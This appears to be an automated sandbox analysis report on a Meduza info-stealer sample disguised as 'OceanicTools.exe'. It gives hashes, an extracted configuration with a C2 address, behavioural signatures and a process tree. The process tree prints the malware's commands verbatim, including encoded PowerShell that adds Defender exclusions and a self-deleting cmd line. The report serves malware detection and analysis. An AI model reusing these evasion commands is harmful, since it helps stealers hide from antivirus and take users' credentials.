Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 23:33

General

  • Target

    OceanicTools.exe

  • Size

    22.2MB

  • MD5

    f975ef6b34160bff3ba3c8c815f9e77c

  • SHA1

    4b818a41b68f8ed6f6719db14e19f955a60aebe8

  • SHA256

    ae04f1bc929f6f83a4010f59fcc1f78caea5d198ae3779c7e058608effcc56af

  • SHA512

    ba08c564b363affea6c39394955feb327a6c15cde9a5b83806088fcfdb4b4464deb24dcbca0e2cb5f26ae9172d7c8fb94ed58e0a534bf21deb4957363f67a222

  • SSDEEP

    98304:XHE3AU4FiZ0ZXawT/2MMlOLG9ffkTj8cywcAk:U3u0Z0EdM1LGdUjKA

Malware Config

Extracted

Family

meduza

C2

79.137.202.152

Attributes
  • anti_dbg

    true

  • anti_vm

    true

  • build_name

    Legenda

  • extensions

    .txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite

  • grabber_max_size

    1.048576e+06

  • port

    15666

  • self_destruct

    true

Signatures

  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

  • Meduza Stealer payload 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\OceanicTools.exe
    "C:\Users\Admin\AppData\Local\Temp\OceanicTools.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3796
    • C:\Windows\SYSTEM32\reg.exe
      "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
      2⤵
        PID:3180
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" "computersystem" "get" "manufacturer"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1084
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cZ2Rhd2poYmdpZGFpbnpweiI=')); Invoke-Expression $cmd"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cZ2Rhd2poYmdpZGFpbnpwelxwZ3h2cXp3YWV5YWJtY2RhLmV4ZSI=')); Invoke-Expression $cmd"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3052
      • C:\Users\Admin\gdawjhbgidainzpz\pgxvqzwaeyabmcda.exe
        "C:\Users\Admin\gdawjhbgidainzpz\pgxvqzwaeyabmcda.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Users\Admin\gdawjhbgidainzpz\pgxvqzwaeyabmcda.exe
          "C:\Users\Admin\gdawjhbgidainzpz\pgxvqzwaeyabmcda.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:4376
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\gdawjhbgidainzpz\pgxvqzwaeyabmcda.exe"
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:4444
            • C:\Windows\system32\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4540

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      43f4bec966ab901ac034fc136a642fa5

      SHA1

      8e7227cefec8b05c9a79b2751d1261187b9c0422

      SHA256

      09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

      SHA512

      a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_reoxkkxx.dk0.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\gdawjhbgidainzpz\pgxvqzwaeyabmcda.exe

      Filesize

      2.6MB

      MD5

      0c01cfc0685211b3c655c7a9526f1849

      SHA1

      864d23804b6e3c98efd1b56863a484b505ddf40b

      SHA256

      8d6ee227c57e825bc978db47c7587d46e7df06e3656d493486ee26b1426c98a6

      SHA512

      6024a41f371d77a82608c0e8ff314853404a50decb77838ace61c43a72ef954f4a227849b85e2aa3ef0749120e8361f13145006652596fb22b2f972bf7585719

    • C:\Users\Admin\gdawjhbgidainzpz\pgxvqzwaeyabmcda.exe:a.dll

      Filesize

      1.4MB

      MD5

      bc690cc3a740f79f71732e6dba60b67a

      SHA1

      1b3b7107bdddcee5f10781f466a52f195190f342

      SHA256

      3fb6b027285db00651f0257df8f5ca9db5665a24a5e23f476cd3e71244bfbc7f

      SHA512

      bd090037334592f7000be3ec1ff3e77f4303f59f071a7fd6d21eee6b96d07d8aaf6f51725369f2823dd9e0fe2bc1f437bc0fc32ee7af2de2ed49c0b654bf521a

    • memory/2752-32-0x00007FF7A8090000-0x00007FF7A8336000-memory.dmp

      Filesize

      2.6MB

    • memory/2752-40-0x00007FF7A8090000-0x00007FF7A8336000-memory.dmp

      Filesize

      2.6MB

    • memory/4376-39-0x0000000140000000-0x000000014013B000-memory.dmp

      Filesize

      1.2MB

    • memory/4376-37-0x0000000140000000-0x000000014013B000-memory.dmp

      Filesize

      1.2MB

    • memory/5052-15-0x00007FFD644A0000-0x00007FFD64F61000-memory.dmp

      Filesize

      10.8MB

    • memory/5052-12-0x00007FFD644A0000-0x00007FFD64F61000-memory.dmp

      Filesize

      10.8MB

    • memory/5052-11-0x00007FFD644A0000-0x00007FFD64F61000-memory.dmp

      Filesize

      10.8MB

    • memory/5052-0-0x00007FFD644A3000-0x00007FFD644A5000-memory.dmp

      Filesize

      8KB

    • memory/5052-6-0x000001E74B350000-0x000001E74B372000-memory.dmp

      Filesize

      136KB